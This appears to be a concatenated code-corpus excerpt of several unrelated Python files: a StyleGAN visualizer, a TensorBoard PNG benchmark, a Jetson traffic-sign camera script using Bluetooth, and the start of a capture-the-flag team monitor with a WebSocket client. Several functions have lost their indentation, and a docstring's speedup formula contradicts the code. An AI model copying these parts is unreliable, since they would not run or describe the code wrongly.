        self._cur_result = None     # most recent result for the current stamp
        self._cur_stamp = 0         # generation counter; bumped by clear_result()
        self._renderer_obj = None   # lazily-created renderer for synchronous mode
        self._args_queue = None     # multiprocessing queue -> worker
        self._result_queue = None   # multiprocessing queue <- worker
        self._process = None        # worker process for asynchronous mode

    def close(self):
        # Terminate the worker process (if any) and drop all resources.
        self._closed = True
        self._renderer_obj = None
        if self._process is not None:
            self._process.terminate()
        self._process = None
        self._args_queue = None
        self._result_queue = None

    @property
    def is_async(self):
        return self._is_async

    def set_async(self, is_async):
        self._is_async = is_async

    def set_args(self, **args):
        """Submit a render request; identical consecutive requests are ignored."""
        assert not self._closed
        if args != self._cur_args:
            if self._is_async:
                self._set_args_async(**args)
            else:
                self._set_args_sync(**args)
            self._cur_args = args

    def _set_args_async(self, **args):
        # Lazily start the worker process, then enqueue the request together
        # with the current generation stamp so stale results can be dropped.
        if self._process is None:
            self._args_queue = multiprocessing.Queue()
            self._result_queue = multiprocessing.Queue()
            try:
                # May already be set elsewhere in the process; that's fine.
                multiprocessing.set_start_method('spawn')
            except RuntimeError:
                pass
            self._process = multiprocessing.Process(target=self._process_fn, args=(self._args_queue, self._result_queue), daemon=True)
            self._process.start()
        self._args_queue.put([args, self._cur_stamp])

    def _set_args_sync(self, **args):
        # Render immediately on the calling thread.
        if self._renderer_obj is None:
            self._renderer_obj = renderer.Renderer()
        self._cur_result = self._renderer_obj.render(**args)

    def get_result(self):
        """Drain the result queue, keeping the newest result whose stamp
        matches the current generation; return it (may be stale or None)."""
        assert not self._closed
        if self._result_queue is not None:
            while self._result_queue.qsize() > 0:
                result, stamp = self._result_queue.get()
                if stamp == self._cur_stamp:
                    self._cur_result = result
        return self._cur_result

    def clear_result(self):
        # Invalidate any pending results by bumping the generation stamp.
        assert not self._closed
        self._cur_args = None
        self._cur_result = None
        self._cur_stamp += 1

    @staticmethod
    def _process_fn(args_queue, result_queue):
        # Worker process main loop: always render the latest queued request,
        # skipping any that were superseded while rendering.
        renderer_obj = renderer.Renderer()
        cur_args = None
        cur_stamp = None
        while True:
            args, stamp = args_queue.get()
            while args_queue.qsize() > 0:
                args, stamp = args_queue.get()
            if args != cur_args or stamp != cur_stamp:
                result = renderer_obj.render(**args)
                if 'error' in result:
                    # Exceptions may not pickle across the process boundary;
                    # wrap as a text-based CapturedException first.
                    result.error = renderer.CapturedException(result.error)
                result_queue.put([result, stamp])
                cur_args = args
                cur_stamp = stamp
#----------------------------------------------------------------------------
@click.command()
@click.argument('pkls', metavar='PATH', nargs=-1)
@click.option('--capture-dir', help='Where to save screenshot captures', metavar='PATH', default=None)
@click.option('--browse-dir', help='Specify model path for the \'Browse...\' button', metavar='PATH')
def main(
    pkls,
    capture_dir,
    browse_dir
):
    """Interactive model visualizer.

    Optional PATH argument can be used specify which .pkl file to load.
    """
    viz = Visualizer(capture_dir=capture_dir)

    if browse_dir is not None:
        viz.pickle_widget.search_dirs = [browse_dir]

    # List pickles: load the first user-supplied pickle, or fall back to
    # pre-populating the "recent" list with the official pretrained URLs.
    if len(pkls) > 0:
        for pkl in pkls:
            viz.add_recent_pickle(pkl)
        viz.load_pickle(pkls[0])
    else:
        pretrained = [
            'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan3/versions/1/files/stylegan3-r-afhqv2-512x512.pkl',
            'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan3/versions/1/files/stylegan3-r-ffhq-1024x1024.pkl',
            'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan3/versions/1/files/stylegan3-r-ffhqu-1024x1024.pkl',
            'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan3/versions/1/files/stylegan3-r-ffhqu-256x256.pkl',
            'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan3/versions/1/files/stylegan3-r-metfaces-1024x1024.pkl',
            'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan3/versions/1/files/stylegan3-r-metfacesu-1024x1024.pkl',
            'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan3/versions/1/files/stylegan3-t-afhqv2-512x512.pkl',
            'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan3/versions/1/files/stylegan3-t-ffhq-1024x1024.pkl',
            'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan3/versions/1/files/stylegan3-t-ffhqu-1024x1024.pkl',
            'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan3/versions/1/files/stylegan3-t-ffhqu-256x256.pkl',
            'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan3/versions/1/files/stylegan3-t-metfaces-1024x1024.pkl',
            'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan3/versions/1/files/stylegan3-t-metfacesu-1024x1024.pkl',
            'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan2/versions/1/files/stylegan2-afhqcat-512x512.pkl',
            'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan2/versions/1/files/stylegan2-afhqdog-512x512.pkl',
            'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan2/versions/1/files/stylegan2-afhqv2-512x512.pkl',
            'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan2/versions/1/files/stylegan2-afhqwild-512x512.pkl',
            'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan2/versions/1/files/stylegan2-brecahad-512x512.pkl',
            'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan2/versions/1/files/stylegan2-celebahq-256x256.pkl',
            'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan2/versions/1/files/stylegan2-cifar10-32x32.pkl',
            'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan2/versions/1/files/stylegan2-ffhq-1024x1024.pkl',
            'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan2/versions/1/files/stylegan2-ffhq-256x256.pkl',
            'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan2/versions/1/files/stylegan2-ffhq-512x512.pkl',
            'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan2/versions/1/files/stylegan2-ffhqu-1024x1024.pkl',
            'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan2/versions/1/files/stylegan2-ffhqu-256x256.pkl',
            'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan2/versions/1/files/stylegan2-lsundog-256x256.pkl',
            'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan2/versions/1/files/stylegan2-metfaces-1024x1024.pkl',
            'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan2/versions/1/files/stylegan2-metfacesu-1024x1024.pkl'
        ]

        # Populate recent pickles list with pretrained model URLs.
        for url in pretrained:
            viz.add_recent_pickle(url)

    # Run the GUI loop until the user closes the window.
    while not viz.should_close():
        viz.draw_frame()
    viz.close()
#----------------------------------------------------------------------------
# Script entry point: launch the click-wrapped visualizer CLI.
if __name__ == "__main__":
    main()
#----------------------------------------------------------------------------
|
encode_png_benchmark.py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Benchmarks for the `tensorboard.util.encode_png` function.
Here are the results of running this benchmark on a workstation running
Ubuntu 14.04 with an Intel(R) Xeon(R) CPU E5-1650 v4 @ 3.60GHz:
THREADS TOTAL_TIME UNIT_TIME SPEEDUP PARALLELISM
1 2.6311 2.6311 1.0000 1.0000
2 2.6070 1.3035 2.0185 1.0092
4 2.7108 0.6777 3.8824 0.9706
6 2.6347 0.4391 5.9917 0.9986
8 3.3163 0.4145 6.3471 0.7934
10 3.5899 0.3590 7.3290 0.7329
12 3.7949 0.3162 8.3198 0.6933
14 6.1140 0.4367 6.0248 0.4303
16 6.2662 0.3916 6.7182 0.4199
32 10.5142 0.3286 8.0077 0.2502
The total time for one thread is the "base time." Speedup is computed by
dividing the unit time by the base time. Effective parallelism is computed
by dividing the speedup by the number of threads used.
Note that the CPU used has six physical cores and twelve virtual cores;
correspondingly, the effective parallelism is excellent with up to six
threads, drops somewhat after six threads, and drops significantly after
twelve threads.
The above numbers are consistent across runs, within about 5%.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import datetime
import threading
import time
from six.moves import xrange
from absl import app
from absl import logging
import numpy as np
import tensorflow as tf
from tensorboard.util import encoder
from tensorboard.util import tb_logging
logger = tb_logging.get_logger()
def bench(image, thread_count):
    """Encode `image` to PNG on `thread_count` threads in parallel.

    Returns:
      A `float` representing number of seconds that it takes all threads
      to finish encoding `image`.
    """
    threads = [
        threading.Thread(target=lambda: encoder.encode_png(image))
        for _ in xrange(thread_count)
    ]
    # Use a monotonic high-resolution clock for the measurement.
    # datetime.datetime.now() is wall-clock time and can jump backwards or
    # forwards (NTP adjustment, DST), which would corrupt benchmark numbers.
    start_time = time.perf_counter()
    for thread in threads:
        thread.start()
    for thread in threads:
        thread.join()
    return time.perf_counter() - start_time
def _image_of_size(image_size):
"""Generate a square RGB test image of the given side length."""
return np.random.uniform(0, 256, [image_size, image_size, 3]).astype(
np.uint8
)
def _format_line(headers, fields):
"""Format a line of a table.
Arguments:
headers: A list of strings that are used as the table headers.
fields: A list of the same length as `headers` where `fields[i]` is
the entry for `headers[i]` in this row. Elements can be of
arbitrary types. Pass `headers` to print the header row.
Returns:
A pretty string.
"""
assert len(fields) == len(headers), (fields, headers)
fields = [
"%2.4f" % field if isinstance(field, float) else str(field)
for field in fields
]
return " ".join(
" " * max(0, len(header) - len(field)) + field
for (header, field) in zip(headers, fields)
)
def main(unused_argv):
    """Run the encode_png benchmark across a range of thread counts and
    log one table row per count."""
    logging.set_verbosity(logging.INFO)
    np.random.seed(0)
    # Must start with 1: results[1] is the single-thread baseline used to
    # compute speedup for every other row.
    thread_counts = [1, 2, 4, 6, 8, 10, 12, 14, 16, 32]

    logger.info("Warming up...")
    warmup_image = _image_of_size(256)
    for thread_count in thread_counts:
        bench(warmup_image, thread_count)

    logger.info("Running...")
    results = {}
    image = _image_of_size(4096)
    headers = ("THREADS", "TOTAL_TIME", "UNIT_TIME", "SPEEDUP", "PARALLELISM")
    logger.info(_format_line(headers, headers))
    for thread_count in thread_counts:
        time.sleep(1.0)  # let the system quiesce between measurements
        total_time = min(
            bench(image, thread_count) for _ in xrange(3)
        )  # best-of-three timing
        unit_time = total_time / thread_count
        if total_time < 2.0:
            # Logger.warn is deprecated; warning() is the supported spelling.
            logger.warning(
                "This benchmark is running too quickly! This "
                "may cause misleading timing data. Consider "
                "increasing the image size until it takes at "
                "least 2.0s to encode one image."
            )
        results[thread_count] = unit_time
        speedup = results[1] / results[thread_count]
        parallelism = speedup / thread_count
        fields = (thread_count, total_time, unit_time, speedup, parallelism)
        logger.info(_format_line(headers, fields))
# Script entry point: absl's app.run handles flag parsing before calling main.
if __name__ == "__main__":
    app.run(main)
|
camera_inference.py | from camera_parameters import *
import torch
import numpy as np
import cv2, os, time, datetime
import random
import detectron2
from bt_server import BTServer
from predictor import MTSDPredictor
from detection_utils import *
from detectron2.config import get_cfg
import threading
import statistics
def gstreamer_pipeline(
    capture_width=CAP_WIDTH,
    capture_height=CAP_HEIGHT,
    display_width=CAP_WIDTH,
    display_height=CAP_HEIGHT,
    framerate=FPS,
    flip_method=0,
):
    """Build the GStreamer pipeline string for the CSI camera.

    Captures NV12 frames via nvarguscamerasrc, optionally flips them, and
    converts to BGR so OpenCV's appsink can consume the frames.
    """
    template = (
        "nvarguscamerasrc ! "
        "video/x-raw(memory:NVMM), "
        "width=(int)%d, height=(int)%d, "
        "format=(string)NV12, framerate=(fraction)%d/1 ! "
        "nvvidconv flip-method=%d ! "
        "video/x-raw, width=(int)%d, height=(int)%d, format=(string)BGRx ! "
        "videoconvert ! "
        "video/x-raw, format=(string)BGR ! appsink"
    )
    values = (
        capture_width,
        capture_height,
        framerate,
        flip_method,
        display_width,
        display_height,
    )
    return template % values
class CamVideoWriter:
    '''
    class for writing the video from the cam
    '''

    def __init__(self, out):
        # out: an opened video writer (anything exposing write(frame)).
        self.out = out
        # Ticket counters used to flush frame batches in submission order:
        # next_id is the ticket currently allowed to write, curr_id is the
        # next ticket to be handed out.
        self.next_id = 0
        self.curr_id = 0

    def write(self, frames):
        """Queue *frames* for writing on a background daemon thread and
        return self."""
        worker = threading.Thread(target=self._write_frames, args=[frames])
        worker.daemon = True
        worker.start()
        return self

    def _write_frames(self, frames):
        # Take a ticket, then busy-wait (with sleeps) until it is our turn
        # so that batches are written in the order they were submitted.
        ticket = self.curr_id
        self.curr_id = self.curr_id + 1
        while ticket != self.next_id:
            time.sleep(0.1)
        for frame in frames:
            self.out.write(frame)
        self.next_id = self.next_id + 1
class InferenceVideoWriter:
    '''
    class for writing the video of inference
    '''

    def __init__(self, out):
        # out: an opened cv2.VideoWriter (or compatible object with write()).
        self.out = out

    def write(self, frame, fps):
        """Start a background daemon thread that repeatedly writes the
        current `self.frame` at roughly `fps` frames per second.

        Callers update `self.frame` to change what gets written and set
        `self.writing = False` to stop the thread.
        """
        self.frame = frame
        self.fps = fps
        self.writing = True
        t = threading.Thread(target=self._write_frames)
        t.daemon = True
        t.start()
        return self

    def _write_frames(self):
        # Loop until the owner clears self.writing.
        while self.writing:
            self.out.write(self.frame)
            # The 0.66 factor shortens the sleep, presumably to compensate
            # for the time spent inside out.write() -- TODO confirm tuning.
            time.sleep((1/self.fps)* 0.66)
class VideoCapture:
    '''
    class for reading frames from the camera. It keeps the most recent frame.
    '''

    def __init__(self, cap):
        # cap: an opened cv2.VideoCapture.
        self.cap = cap

    def startReadingFrames(self):
        """Read one frame synchronously (so latest_frame exists), then keep
        refreshing it on a background daemon thread. Returns self."""
        _, self.latest_frame = self.cap.read()
        t = threading.Thread(target=(self._read_frames))
        t.daemon = True
        t.start()
        return self

    def _read_frames(self):
        # Continuously overwrite latest_frame so read() always returns the
        # most recent image instead of a stale buffered one.
        self.frame_num = 0
        read = True
        while self.cap.isOpened():
            self.frame_num=self.frame_num+1
            #self.cap.grab()
            #if(i%2==0):
            #    read, self.latest_frame = self.cap.retrieve()
            read, self.latest_frame = self.cap.read()
            # ~8.5 reads/second; presumably matched to the source frame
            # rate -- TODO confirm against FPS in camera_parameters.
            time.sleep(0.118)

    def read(self):
        # Return the most recently captured frame (may repeat frames; may be
        # None if the source runs out before startReadingFrames succeeded).
        return self.latest_frame

    def release(self):
        self.cap.release()
def run_camera_inference(bt_server, predictor):
    '''
    method for running the inference on a live camera image

    Reads frames from the CSI camera via GStreamer, runs the detector on a
    cropped region whenever the Bluetooth client has enabled detection, and
    streams any detections back over bt_server.
    '''
    cap =VideoCapture(cv2.VideoCapture(gstreamer_pipeline(), cv2.CAP_GSTREAMER))
    # Two warm-up inferences on dummy input so the first real frame is not
    # slowed down by lazy model initialization.
    predictor(np.zeros((CROPPED_WIDTH, CROPPED_HEIGHT,3)))
    predictor(np.zeros((CROPPED_WIDTH, CROPPED_HEIGHT,3)))
    if cap.cap.isOpened():
        cap.startReadingFrames()
        try:
            while True:
                tic = time.time()
                img = cap.read()
                cropped_im = crop_img(img)
                visualisation = cropped_im.copy()
                if(bt_server.detecting):
                    outputs = predictor(cv2.resize(cropped_im, (CROPPED_WIDTH, CROPPED_HEIGHT)))
                    if(len(outputs['instances'])> 0):
                        bt_server.startSendingDetections(outputs, cropped_im)
                    # (A commented-out block drawing detection boxes onto
                    # `visualisation` used to live here; see
                    # run_video_inference for the equivalent drawing code.)
                    print("detection time", time.time() - tic)
                #cv2.imshow("Camera", visualisation)
                if(bt_server.test_required):
                    bt_server.sendTestImage(img)
                # If the Bluetooth peer disconnected, stop detecting and go
                # back to accepting new connections.
                try:
                    bt_server.socket.getpeername()
                except:
                    bt_server.detecting = False
                    bt_server.startAccepting()
                # ESC exits the loop (only relevant when a window is shown).
                keyCode = cv2.waitKey(30) & 0xFF
                if keyCode == 27:
                    break
            cap.cap.release()
            cv2.destroyAllWindows()
        except KeyboardInterrupt:
            print("stopped")
            cap.cap.release()
            cv2.destroyAllWindows()
    else:
        print("Unable to open camera")
def run_video_inference(predictor, filename):
    '''
    method for running the inference on a video file

    Runs the detector over every frame of `filename`, collects per-frame FPS
    statistics (split by frames with/without detections), and writes a
    results_*.txt report listing the stats and every detection.
    '''
    cap = VideoCapture(cv2.VideoCapture(filename))
    name = "output{}".format(datetime.datetime.now().time())
    #_out = cv2.VideoWriter('/home/pkos/workspace/praca_inzynierska/jetson_app/inference_out/{}.mp4'.format(name),
    #        cv2.VideoWriter_fourcc(*'MP4V'), 8, (CAP_WIDTH,CAP_HEIGHT))
    #out = InferenceVideoWriter(_out)
    # Two warm-up inferences so lazy model initialization does not skew the
    # first measured frame.
    predictor(np.zeros((CROPPED_WIDTH, CROPPED_HEIGHT,3)))
    predictor(np.ones((CROPPED_WIDTH, CROPPED_HEIGHT,3)))
    if cap.cap.isOpened():
        #window_handle = cv2.namedWindow("Camera", cv2.WINDOW_AUTOSIZE)
        cap.startReadingFrames()
        fpss = []        # list of (fps, had_detection) per processed frame
        detections=[]    # (elapsed seconds, "class, score", frame number)
        starttime = time.time()
        #writing_started = False
        videostarttime=None
        try:
            tic = time.time()
            while True:
                detection = False
                img = cap.read()
                if(img is None):
                    # VideoCapture keeps only the latest frame; None means
                    # the file is exhausted.
                    break
                #visualisation = img
                cropped_im = crop_img(img)
                #cropped_im = img
                visualisation = img#cropped_im#.copy()
                outputs = predictor(cv2.resize(cropped_im, (CROPPED_WIDTH, CROPPED_HEIGHT)))
                if(len(outputs['instances'])> 0):
                    detection=True
                    #print("detection")
                    #bt_server.startSendingDetections(outputs, cropped_im)
                    boxes, classes, scores = handle_prediction(outputs)
                    boxes, classes, scores = nms(boxes, classes, scores, 0.5)
                    for i, box in enumerate(boxes):
                        detections.append((int(time.time() - starttime), f"{classes[i]}, {scores[i]:.2f}", cap.frame_num))
                        # Map box coordinates from the cropped/scaled image
                        # back to the full frame; the 0.1/0.25 offsets
                        # presumably mirror crop_img's crop margins -- TODO
                        # confirm against camera_parameters.
                        box_top = max(0, box[1] * SCALE_RATIO + 0.1 * CAP_HEIGHT)
                        box_bottom = min(CAP_HEIGHT, box[3] * SCALE_RATIO + 0.1 * CAP_HEIGHT)
                        box_l = max(0, box[0] * SCALE_RATIO + 0.25 * CAP_WIDTH)
                        box_r = min(CAP_WIDTH, box[2] * SCALE_RATIO + 0.25 * CAP_WIDTH)
                        visualisation = cv2.rectangle(
                            visualisation,
                            (int(box_l), int(box_top)),
                            (int(box_r), int(box_bottom)),
                            (0,255,0),
                            2
                        )
                        visualisation = cv2.putText(
                            visualisation,
                            f"{classes[i]}, {scores[i]:.2f}",
                            (int(box_l),int(box_top*0.95)),
                            cv2.FONT_HERSHEY_SIMPLEX,
                            0.6,
                            (0,255,0),
                            1
                        )
                det_time = time.time() - tic
                if(cap.frame_num%10==0):
                    print(det_time)
                fps = 1/det_time
                fpss.append((fps, detection))
                visualisation = cv2.putText(visualisation, "{:.2f}".format(fps),(12,20), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,255),2)
                #cv2.imshow("Camera", visualisation)
                if(videostarttime is None):
                    videostarttime=time.time()
                #if(not writing_started):
                #    out.write(visualisation, 9)
                #    writing_started = True
                #out.frame = visualisation
                # keyCode = cv2.waitKey(1) & 0xFF
                # if keyCode == 27:
                #     break
                #print("whole time", time.time() - tic)
                tic = time.time()
            time.sleep(0.5)
            #out.writing = False
            duration = time.time() - starttime
            print("duration", duration)
            print("videoduration", time.time() - videostarttime)
            # Drop the first two samples of each series (warm-up noise).
            # NOTE(review): statistics.mean/stdev raise if a series has
            # fewer than 1/2 samples (e.g. a video with no detections).
            no_det_fpss = [f[0] for f in fpss if not f[1]][2:]
            det_fpss = [f[0] for f in fpss if f[1]][2:]
            all_fpss = [f[0] for f in fpss]
            avg_fps_det = statistics.mean(det_fpss)
            std_fps_det = statistics.stdev(det_fpss)
            max_fps_det = max(det_fpss)
            min_fps_det = min(det_fpss)
            avg_fps_nodet = statistics.mean(no_det_fpss)
            std_fps_nodet = statistics.stdev(no_det_fpss)
            max_fps_nodet = max(no_det_fpss)
            min_fps_nodet = min(no_det_fpss)
            avg_fps_all = statistics.mean(all_fpss)
            std_fps_all = statistics.stdev(all_fpss)
            max_fps_all = max(all_fpss)
            min_fps_all = min(all_fpss)
            with open("results_{}.txt".format(datetime.datetime.now()),'w+') as f:
                f.write(f"filename: (unknown)\n")
                f.write(f"duration: {duration}\n")
                f.write(f"\nframes with detected signs:\n")
                f.write(f"avg fps: {avg_fps_det}\n")
                f.write(f"std fps: {std_fps_det}\n")
                f.write(f"max fps: {max_fps_det}\n")
                f.write(f"min fps: {min_fps_det}\n")
                f.write(f"\nframes without detected signs:\n")
                f.write(f"avg fps: {avg_fps_nodet}\n")
                f.write(f"std fps: {std_fps_nodet}\n")
                f.write(f"max fps: {max_fps_nodet}\n")
                f.write(f"min fps: {min_fps_nodet}\n")
                f.write(f"\nframes total:\n")
                f.write(f"avg fps: {avg_fps_all}\n")
                f.write(f"std fps: {std_fps_all}\n")
                f.write(f"max fps: {max_fps_all}\n")
                f.write(f"min fps: {min_fps_all}\n")
                f.write("\ndetections:\n")
                for d in detections:
                    f.write(f"{d[0]}, {d[1]}, second {d[2]/FPS}\n")
            cap.release()
            cv2.destroyAllWindows()
        except KeyboardInterrupt:
            # NOTE(review): `out` is never created (its assignment is
            # commented out above), so this line raises NameError if the
            # user interrupts the run -- needs fixing or removing.
            out.writing = False
            print("stopped")
            cap.release()
            cv2.destroyAllWindows()
def record_and_save(bt_server):
    '''
    method for recording and saving the video file

    Waits until the Bluetooth client enables recording (bt_server.detecting),
    then captures camera frames in batches of 30 and hands them to a
    CamVideoWriter until the client disconnects or recording is disabled.
    '''
    cap = cv2.VideoCapture(gstreamer_pipeline(flip_method=0, framerate=FPS+1), cv2.CAP_GSTREAMER)
    # Idle loop: keep the camera warm and answer test-image requests until
    # the client asks us to start recording.
    while not bt_server.detecting:
        _, img = cap.read()
        if(bt_server.test_required):
            bt_server.sendTestImage(img)
    name = "output{}".format(datetime.datetime.now().time())
    _out = cv2.VideoWriter('/home/pkos/workspace/praca_inzynierska/jetson_app/outputs/{}.mp4'.format(name),
            cv2.VideoWriter_fourcc(*'MP4V'), FPS, (CAP_WIDTH,CAP_HEIGHT))
    out = CamVideoWriter(_out)
    fpss =0   # running FPS sum, reset every FPS*5 frames
    i=0       # frame counter for the periodic FPS printout
    start = time.time()
    frames = []  # current batch of frames awaiting a background write
    try:
        while bt_server.detecting:
            i=i+1
            tic = time.time()
            ret, frame = cap.read()
            #print("read_fps:", 1/(time.time()-tic))
            if ret:
                #frame = cv2.flip(frame,0)
                frames.append(frame)
                # Flush in batches of 30 so disk writes happen off-thread.
                if(len(frames)==30):
                    out.write(frames)
                    frames=[]
                #cv2.imshow('frame',frame)
                # if cv2.waitKey(1) & 0xFF == ord('q'):
                #     break
                if(bt_server.test_required):
                    bt_server.sendTestImage(frame)
            else:
                break
            # Stop recording when the Bluetooth peer disconnects.
            try:
                bt_server.socket.getpeername()
            except:
                bt_server.detecting = False
                #bt_server.startAccepting()
            #time.sleep(max(0,(1/FPS) - (time.time() - tic)))
            fps = 1/(time.time() - tic)
            fpss=fpss + fps#.append(fps)
            if(i%(FPS*5)==0):
                # Print the average FPS over the last window plus the
                # writer's flush progress, then reset the window counters.
                print(fpss/i)
                print(str(out.next_id),"/", str(out.curr_id))
                i=0
                fpss=0
        duration = time.time() - start
        # Wait for every queued batch to be flushed to disk before writing
        # the timing sidecar file.
        while(out.curr_id > out.next_id):
            print(str(out.next_id),"/",str(out.curr_id))
            time.sleep(2)
        # out = cv2.VideoWriter('/home/pkos/workspace/praca_inzynierska/jetson_app/outputs/{}.mp4'.format(name),
        #         cv2.VideoWriter_fourcc(*'MP4V'), FPS, (CAP_WIDTH,CAP_HEIGHT))
        #[out.write(f) for f in frames]
        write_duration =time.time()-start-duration
        with open("/home/pkos/workspace/praca_inzynierska/jetson_app/outputs/{}.txt".format(name), 'w+') as f:
            f.write(str(duration))
            f.write("\n")
            f.write(str(write_duration))
        print("duration", duration)
        print("write duration", time.time() - start - duration)
    except KeyboardInterrupt:
        print("duration", time.time() - start)
    # cap.release()
    # out.release()
    # cv2.destroyAllWindows()
if __name__ == "__main__":
    # Bring up the Bluetooth control server, build the detector from the
    # local config/weights, then run live camera inference.
    bt_server = BTServer()
    bt_server.startAdvertising()
    cfg = get_cfg() # obtain detectron2's default config
    cfg.merge_from_file("config.yml")
    cfg.MODEL.WEIGHTS = os.path.join("./model_final.pth")
    # Confidence threshold for reported detections.
    cfg.MODEL.RETINANET.SCORE_THRESH_TEST = 0.35
    # Match the model's test-time resize bounds to the cropped frame size.
    cfg.INPUT.MIN_SIZE_TEST = CROPPED_HEIGHT
    cfg.INPUT.MAX_SIZE_TEST = CROPPED_WIDTH
    predictor = MTSDPredictor(cfg)
    print("loaded predictor")
    #run_video_inference(predictor, "./outputs/output11_13.mp4")#predictor)
    run_camera_inference(bt_server, predictor)
    #record_and_save(bt_server)
|
BotMonitor.py | #!/usr/bin/env python
"""
Created on Apr 23, 2012
@author: moloch
---------
websocket - WebSocket client library for Python
Copyright (C) 2010 Hiroki Ohtani(liris)
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
---------
Linux/OSX only (well anything with curses really)
Small program used by teams to monitor their flags
For the sake of portability everything is in one file
"""
###################
# > Imports
###################
import os
import sys
import time
import json
import uuid
import array
import struct
import base64
import socket
import random
import hashlib
import logging
import argparse
import platform
import threading
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
from datetime import datetime
try:
import curses
import curses.panel
except ImportError:
sys.stdout.write("Error: Failed to import curses, platform not supported\n")
os._exit(2)
###################
# > Constants
###################
BUFFER_SIZE = 64
MIN_Y = 24
MIN_X = 80
###################
# > Defaults
###################
__version__ = "0.1.1"
__port__ = "8888"
__domain__ = "localhost"
__path__ = "/botnet/climonitor"
__log__ = "bot_monitor.log"
###################
# > Logging
###################
LOG_LEVELS = {
"notset": logging.NOTSET,
"debug": logging.DEBUG,
"info": logging.INFO,
"critical": logging.CRITICAL,
"warn": logging.WARN,
"error": logging.ERROR,
"fatal": logging.FATAL,
}
logger = logging.getLogger()
###################
# > Websockets
###################
"""
websocket python client.
=========================
This version support only hybi-13.
Please see http://tools.ietf.org/html/rfc6455 for protocol.
"""
# websocket supported version.
VERSION = 13
# closing frame status codes.
STATUS_NORMAL = 1000
STATUS_GOING_AWAY = 1001
STATUS_PROTOCOL_ERROR = 1002
STATUS_UNSUPPORTED_DATA_TYPE = 1003
STATUS_STATUS_NOT_AVAILABLE = 1005
STATUS_ABNORMAL_CLOSED = 1006
STATUS_INVALID_PAYLOAD = 1007
STATUS_POLICY_VIOLATION = 1008
STATUS_MESSAGE_TOO_BIG = 1009
STATUS_INVALID_EXTENSION = 1010
STATUS_UNEXPECTED_CONDITION = 1011
STATUS_TLS_HANDSHAKE_ERROR = 1015
class WebSocketException(Exception):
    """
    websocket exception class.

    Base class for all errors raised by this websocket client.
    """
    pass
class WebSocketConnectionClosedException(WebSocketException):
    """
    If remote host closed the connection or some network error happened,
    this exception will be raised.
    """
    pass
default_timeout = None
traceEnabled = False
def enableTrace(traceable):
    """
    turn on/off the traceability.

    traceable: boolean value. if set True, traceability is enabled and the
    module logger level is lowered to DEBUG.
    """
    global traceEnabled
    traceEnabled = traceable
    if traceEnabled:
        logger.setLevel(logging.DEBUG)
def setdefaulttimeout(timeout):
    """
    Set the global timeout setting to connect.

    timeout: default socket timeout in seconds.  Values below 30 are
        silently clamped to a 30 second minimum.
    """
    global default_timeout
    default_timeout = int(timeout)
    if default_timeout < 30:
        default_timeout = 30
    # Bug fix: log the value actually stored — the original logged the raw
    # argument, which is misleading whenever the value has been clamped.
    logging.info("Socket timeout set to: %d" % default_timeout)


def getdefaulttimeout():
    """
    Return the global timeout setting(second) to connect (None if unset).
    """
    return default_timeout
def _parse_url(url):
"""
parse url and the result is tuple of
(hostname, port, resource path and the flag of secure mode)
url: url string.
"""
if ":" not in url:
raise ValueError("url is invalid")
scheme, url = url.split(":", 1)
parsed = urlparse(url, scheme="http")
if parsed.hostname:
hostname = parsed.hostname
else:
raise ValueError("hostname is invalid")
port = 0
if parsed.port:
port = parsed.port
is_secure = False
if scheme == "ws":
if not port:
port = 80
elif scheme == "wss":
is_secure = True
if not port:
port = 443
else:
raise ValueError("scheme %s is invalid" % scheme)
if parsed.path:
resource = parsed.path
else:
resource = "/"
if parsed.query:
resource += "?" + parsed.query
return (hostname, port, resource, is_secure)
def create_connection(url, timeout=None, **options):
    """
    Connect to url and return the WebSocket object.

    Passing optional timeout parameter will set the timeout on the socket.
    If no timeout is supplied, the global default timeout setting returned
    by getdefaulttimeout() is used.
    You can customize using 'options'.
    If you set "header" dict object, you can set your own custom header.

    >>> conn = create_connection("ws://echo.websocket.org/",
    ...      header=["User-Agent: MyProgram",
    ...              "x-custom: header"])

